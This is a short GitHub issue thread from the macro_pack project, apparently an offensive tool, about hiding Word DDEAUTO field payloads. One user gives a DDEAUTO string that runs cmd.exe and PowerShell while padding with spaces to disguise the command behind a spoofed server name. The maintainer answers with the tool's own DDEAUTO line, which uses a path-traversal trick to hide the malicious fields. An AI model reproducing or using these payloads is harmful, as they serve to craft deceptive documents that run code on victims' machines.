### ISSUE TITLE
Better usage of the DDE function

### ISSUE THREAD

**Issue by Bry-fi** [sevagas/macro_pack#8]
In order to throw off some users who are tech savvy we could just spoof the address to whatever we want

{DDEAUTO c:\\windows\\system32\\cmd.exe "server1.evilServer.net                                                                                 /c start powershell.exe}

I used spaces between server1.evilServer.net and the powershell command in our word document. This is to hide our command. We also don't have to use the "Unexpected end of formula" but rather the CTRL + F9 in Word and insert our command.

Note: Do not use tabs they don't do anything.

**Comment by sevagas** [comment]
The current word_dde.py module will generate:
{DDEAUTO "c:\\Program Files\\Microsoft Office\\MSWORD\\..\\..\\..\\windows\\system32\\cmd.exe\" /c <command>" "."}
This hides all malicious fields.
Also I am not sure what you mean by CTRL+F9? the DDE field is inserted by the python code.
You can propose a pull request on word_dde.py if the result is better thant actual module.
Regards,
Emeric

**Comment by sevagas** [comment]
No suggestion, will close issue.
